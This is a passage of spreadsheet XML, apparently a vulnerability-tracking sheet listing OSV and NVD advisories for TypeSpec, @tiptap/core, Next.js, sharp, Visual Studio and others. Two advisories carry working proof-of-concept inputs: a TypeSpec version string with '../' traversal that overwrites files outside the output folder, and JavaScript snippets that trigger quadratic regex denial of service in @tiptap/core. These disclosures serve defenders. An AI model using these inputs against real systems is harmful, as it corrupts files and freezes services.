It is interpolated without path validation at `openapi.ts:629-641`:
```ts
return interpolatePath(options.outputFile, {
  "openapi-version": specVersion,
  "service-name-if-multiple": multipleService ? getNamespaceFullName(service.type) : undefined,
  "service-name": getNamespaceFullName(service.type),
  "file-type": fileType,
  version,
});
```
The path reaches `emitFile()` at `openapi.ts:392-401`. The sink at `packages/compiler/src/core/emitter-utils.ts:29-39` performs no output-root containment check:
```ts
const outputFolder = getDirectoryPath(options.path);
await program.host.mkdirp(outputFolder);
return await program.host.writeFile(options.path, content);
```
`resolvePath()` joins the template to `emitterOutputDir` before `{version}` is interpolated, so it does not see the attacker-controlled `..` components.
### Proof of concept
The relevant input in `poc/main.tsp` is:
```tsp
@versioned(Versions) namespace Svc;
enum Versions { v1: "../../../../../../../../../../tmp/TYPESPEC_PWNED/pwn" }
```
Run from PowerShell:
```powershell
cd poc
.\run-revalidation.ps1
```
The supplied Docker runner uses a digest-pinned Node base, a committed npm integrity lock, disabled runtime networking, a benign control, a 90-second timeout, and cleanup enforcement.
Observed in the preserved identity-locked replay (`1/1` attack and `1/1` negative control):
```text
negative_before=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
negative_after=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
attack_before=7a8067bc04e42a025de90fd7aff9be4df59f005d192f2116eecfb107d7bffd78
attack_after=2992b399c1573c9bd2130794f8554c4026bf425861f74e78b5d89ae0324b5e38
outside_file_head=openapi: 3.0.0
inside_attack_files=
```
The benign version preserved the outside canary. The crafted version replaced it with emitted OpenAPI content, and no attack output file remained under `tsp-output`.
### Impact and constraints
Proven impact is out-of-directory YAML/JSON creation or overwrite. The attacker can influence the traversal, final basename, and many strings in the OpenAPI-structured content. The extension is constrained to the selected emitter format, content is not arbitrary bytes, and the target must be writable.
This report demonstrates file corruption. Denial of service is a potential impact when a writable critical file is targeted. It does not claim file disclosure, arbitrary-byte write, deployment takeover, or code execution by a downstream consumer.
### Suggested remediation
After every filename token has been interpolated, resolve the completed destination against `emitterOutputDir` and reject any non-descendant using path-component-aware comparison. Reject or slugify absolute paths, path separators, and traversal components in spec-derived filename tokens. Add regression cases for POSIX and Windows separators, absolute values, sibling-prefix paths, and benign semantic versions.</t>
        </is>
      </c>
      <c r="T1074" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1075" s="5" t="inlineStr">
        <is>
          <t>GHSA-2xp9-vwfh-vxw4</t>
        </is>
      </c>
      <c r="D1075" s="5" t="inlineStr"/>
      <c r="E1075" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1075" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="inlineStr"/>
      <c r="I1075" s="5" t="inlineStr"/>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr"/>
      <c r="L1075" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M1075" s="5" t="inlineStr">
        <is>
          <t>15.5.24, 16.3.3</t>
        </is>
      </c>
      <c r="N1075" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1075" s="5" t="inlineStr"/>
      <c r="R1075" s="5" t="inlineStr"/>
      <c r="S1075" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.
Until a fix has propagated, optimization of AVIF files is disabled.</t>
        </is>
      </c>
      <c r="T1075" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1076" s="5" t="inlineStr">
        <is>
          <t>GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
      <c r="D1076" s="5" t="inlineStr"/>
      <c r="E1076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1076" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="inlineStr"/>
      <c r="I1076" s="5" t="inlineStr"/>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr"/>
      <c r="L1076" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1076" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1076" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1076" s="5" t="inlineStr"/>
      <c r="R1076" s="5" t="inlineStr"/>
      <c r="S1076" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-63gh-g2x5-x69v. This link is maintained to preserve external references.
### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T1076" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1077" s="5" t="inlineStr">
        <is>
          <t>GHSA-j95f-988m-3j2f</t>
        </is>
      </c>
      <c r="D1077" s="5" t="inlineStr"/>
      <c r="E1077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1077" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="inlineStr"/>
      <c r="I1077" s="5" t="inlineStr"/>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr"/>
      <c r="L1077" s="5" t="inlineStr">
        <is>
          <t>npm:@tiptap/core</t>
        </is>
      </c>
      <c r="M1077" s="5" t="inlineStr">
        <is>
          <t>3.30.5</t>
        </is>
      </c>
      <c r="N1077" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1077" s="5" t="inlineStr"/>
      <c r="R1077" s="5" t="inlineStr"/>
      <c r="S1077" s="5" t="inlineStr">
        <is>
          <t>## Summary
`@tiptap/core` contains two quadratic regular-expression denial-of-service paths in its default Markdown attribute parsers. Pandoc-style block attributes use two unanchored greedy expressions that rescan repeated `__QUOTED_0` prefixes. Inline shortcode attributes use another unanchored greedy key expression that rescans a long word-character run when no equals sign follows.
The public `createAtomBlockMarkdownSpec` and `createBlockMarkdownSpec` helpers call the vulnerable Pandoc-style parser; `createInlineMarkdownSpec` calls the separately vulnerable shortcode parser. Using unmodified npm 3.29.2, a complete 20,508-byte atom-block token took approximately 1.40 seconds while an equal-length control took 0.29 ms. A complete 32,776-byte inline token took approximately 2.21 seconds while its equal-length control took 0.19 ms. Current repository `main` commit `5158212970344952dd9918b6a44bfb400d7fb6c1` retains both expressions.
## Block attribute root cause
`packages/core/src/utilities/markdown/attributeUtils.ts` uses both `matchAll` and `replace` with `/([a-zA-Z][\w-]*)\s*=\s*(__QUOTED_\d+__)/g`. The candidate is `'__QUOTED_0'.repeat(n) + '__QUOTED_0__'`. There are no quotes, so the preceding replacement leaves it unchanged. At each `Q`, the greedy key-name expression consumes the remaining word-character run, the required equals sign fails, and the unanchored engine restarts at the next `Q`. This yields `O(n^2)` work, and the cleanup pass repeats it.
A complete public-API proof is:
```js
import { createAtomBlockMarkdownSpec } from '@tiptap/core'
const tokenizer = createAtomBlockMarkdownSpec({ nodeName: 'probe' }).markdownTokenizer
const attack = '__QUOTED_0'.repeat(2048) + '__QUOTED_0__'
const source = `:::probe {${attack}} :::\n`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```
Measured complete-tokenizer timings were 6.23, 23.12, 88.93, 369.10, and 1,400.17 ms at 1,308, 2,588, 5,148, 10,268, and 20,508 bytes. Equal-length controls took 0.07 to 0.29 ms. The directly exported parser took 5,645.71 ms at 40,972 bytes while its control took 0.64 ms.
## Inline attribute root cause
`packages/core/src/utilities/markdown/createInlineMarkdownSpec.ts` uses `/(\w+)=(?:"([^"]*)"|'([^']*)')/g`. For a long word-character run without an equals sign, `\w+` consumes the remaining suffix, `=` fails, and the unanchored engine restarts at the next character. The default inline tokenizer extracts this attacker string directly from a syntactically complete `[shortcode attributes]` token.
```js
import { createInlineMarkdownSpec } from '@tiptap/core'
const tokenizer = createInlineMarkdownSpec({ nodeName: 'probe', selfClosing: true }).markdownTokenizer
const source = `[probe ${'0'.repeat(32768)}]`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```
At 1,032, 2,056, 4,104, 8,200, 16,392, and 32,776 bytes, candidates took 3.24, 12.88, 54.82, 136.91, 557.83, and 2,209.47 ms. Equal-length hyphen controls took 0.02 to 0.19 ms.
## Impact
Applications parsing attacker-controlled Markdown with these helpers can have a browser main thread, server event loop, or worker blocked by a small input. Persisted documents can repeatedly freeze clients; repeated requests can exhaust server-side parsing capacity. Editors that only consume validated ProseMirror JSON and never invoke the Markdown parsing path are not directly affected through document content.
## History and remediation
Commit `35645d94ae9cd73448a564104c2e08f64e9564bc` introduced both parsers on 14 October 2025, first released in 3.7.0. Versions 3.7.0 through current 3.29.2 and current `main` remain affected. Official issue, PR, and repository-advisory searches found no duplicate.
Require a start-of-string or whitespace boundary before both key-value parsers, and preferably replace the multi-pass placeholder and shortcode regex designs with deterministic single-pass tokenizers. Keep quoted values out-of-band so attacker input cannot collide with predictable `__QUOTED_n__` placeholders. Add complete block and inline Markdown-tokenizer scaling regressions with equal-length controls.
Please credit GitHub user `joostgrunwald` as finder/reporter.</t>
        </is>
      </c>
      <c r="T1077" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1078" s="5" t="inlineStr">
        <is>
          <t>GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
      <c r="D1078" s="5" t="inlineStr"/>
      <c r="E1078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1078" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="inlineStr"/>
      <c r="I1078" s="5" t="inlineStr"/>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr"/>
      <c r="L1078" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1078" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1078" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1078" s="5" t="inlineStr"/>
      <c r="R1078" s="5" t="inlineStr"/>
      <c r="S1078" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-527h-q9f6-p7qx. This link is maintained to preserve external references.
### Original Description
Heap-based buffer overflow in .NET and Visual Studio allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T1078" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1079" s="5" t="inlineStr">
        <is>
          <t>GHSA-q72m-f2r4-w4cw</t>
        </is>
      </c>
      <c r="D1079" s="5" t="inlineStr"/>
      <c r="E1079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1079" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="inlineStr"/>
      <c r="I1079" s="5" t="inlineStr"/>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr"/>
      <c r="L1079" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1079" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1079" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1079" s="5" t="inlineStr"/>
      <c r="R1079" s="5" t="inlineStr"/>
      <c r="S1079" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2j8r-3c22-8565. This link is maintained to preserve external references.
### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T1079" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1080" s="5" t="inlineStr">
        <is>
          <t>GHSA-rgj7-g3m4-5g8c</t>
        </is>
      </c>
      <c r="D1080" s="5" t="inlineStr"/>
      <c r="E1080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1080" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="inlineStr"/>
      <c r="I1080" s="5" t="inlineStr"/>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr"/>
      <c r="L1080" s="5" t="inlineStr">
        <is>
          <t>npm:sharp</t>
        </is>
      </c>
      <c r="M1080" s="5" t="inlineStr">
        <is>
          <t>0.35.4</t>
        </is>
      </c>
      <c r="N1080" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1080" s="5" t="inlineStr"/>
      <c r="R1080" s="5" t="inlineStr"/>
      <c r="S1080" s="5" t="inlineStr">
        <is>
          <t>### Impact
A number of vulnerabilities, two rated as "Critical" severity using CVSSv3, have been discovered and fixed in the upstream libheif dependency. These can lead to possible remote code execution (RCE) on glibc-based Linux when run under certain conditions.
The attack vector for these claims to be "network" however sharp does not provide any networking features so this vulnerability is down-rated to a "High" severity using CVSSv4 but please note its Subsequent System Impact.
Those processing untrusted input with versions of sharp prior to 0.35.4 are affected.
### Patches
#### Using prebuilt binaries provided by sharp?
Most people rely on the prebuilt binaries provided by sharp.
Please upgrade sharp to the latest version, currently 0.35.4, which provides libheif 1.23.2.
#### Using a globally-installed libheif?
Please ensure you are using the latest libheif 1.23.2.
### Workarounds
Add the following to your code to prevent sharp from decoding AVIF images.
```js
sharp.block({ operation: ["VipsForeignLoadHeif"] });
```
Ensure you are using a `node` executable binary compiled as a Position Independent Executable (PIE). Most Linux package managers already do this for protection against RCE however be warned that the "official" Node.js binaries do not.
### References
- [CVE-2026-84383](https://github.com/strukturag/libheif/security/advisories/GHSA-g89c-p67h-r497)
- https://github.com/strukturag/libheif/security/advisories/GHSA-2jg2-4ch7-h545</t>
        </is>
      </c>
      <c r="T1080" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D1081" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E1081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1081" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G1081" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H1081" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1081" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L1081" s="5" t="inlineStr"/>
      <c r="M1081" s="5" t="inlineStr"/>
      <c r="N1081" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O1081" s="5" t="inlineStr"/>
      <c r="P1081" s="5" t="inlineStr"/>
      <c r="Q1081" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R1081" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="S1081" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="T1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D1082" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E1082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1082" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G1082" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H1082" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1082" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L1082" s="5" t="inlineStr"/>
      <c r="M1082" s="5" t="inlineStr"/>
      <c r="N1082" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O1082" s="5" t="inlineStr"/>
      <c r="P1082" s="5" t="inlineStr"/>
      <c r="Q1082" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="R1082" s="5" t="inlineStr"/>
      <c r="S1082" s="5"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T1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T1082"/>
  <conditionalFormatting sqref="E2:E108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08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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T954" r:id="rId953"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T955" r:id="rId954"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T956" r:id="rId955"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T957" r:id="rId956"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T958" r:id="rId957"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T959" r:id="rId958"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T960" r:id="rId959"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T961" r:id="rId960"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T962" r:id="rId961"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T963" r:id="rId962"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T964" r:id="rId963"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T965" r:id="rId964"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T966" r:id="rId965"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T967" r:id="rId966"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T968" r:id="rId967"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T969" r:id="rId968"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T970" r:id="rId969"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T971" r:id="rId970"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T972" r:id="rId971"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T973" r:id="rId972"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T974" r:id="rId973"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T975" r:id="rId974"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T976" r:id="rId975"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T977" r:id="rId976"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T978" r:id="rId977"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T979" r:id="rId978"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T980" r:id="rId979"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T981" r:id="rId980"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T982" r:id="rId981"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T983" r:id="rId982"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T984" r:id="rId983"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T985" r:id="rId984"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T986" r:id="rId985"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T987" r:id="rId986"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T988" r:id="rId987"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T989" r:id="rId988"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T990" r:id="rId989"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T991" r:id="rId990"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T992" r:id="rId991"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T993" r:id="rId992"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T994" r:id="rId993"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T995" r:id="rId994"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T996" r:id="rId995"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T997" r:id="rId996"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T998" r:id="rId997"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T999" r:id="rId998"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1000" r:id="rId999"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1001" r:id="rId1000"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1002" r:id="rId1001"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1003" r:id="rId1002"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1004" r:id="rId1003"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1005" r:id="rId1004"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1006" r:id="rId1005"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1007" r:id="rId1006"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1008" r:id="rId1007"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1009" r:id="rId1008"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1010" r:id="rId1009"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1011" r:id="rId1010"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1012" r:id="rId1011"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1013" r:id="rId1012"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1014" r:id="rId1013"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1015" r:id="rId1014"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1016" r:id="rId1015"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1017" r:id="rId1016"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1018" r:id="rId1017"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1019" r:id="rId1018"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1020" r:id="rId1019"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1021" r:id="rId1020"/>
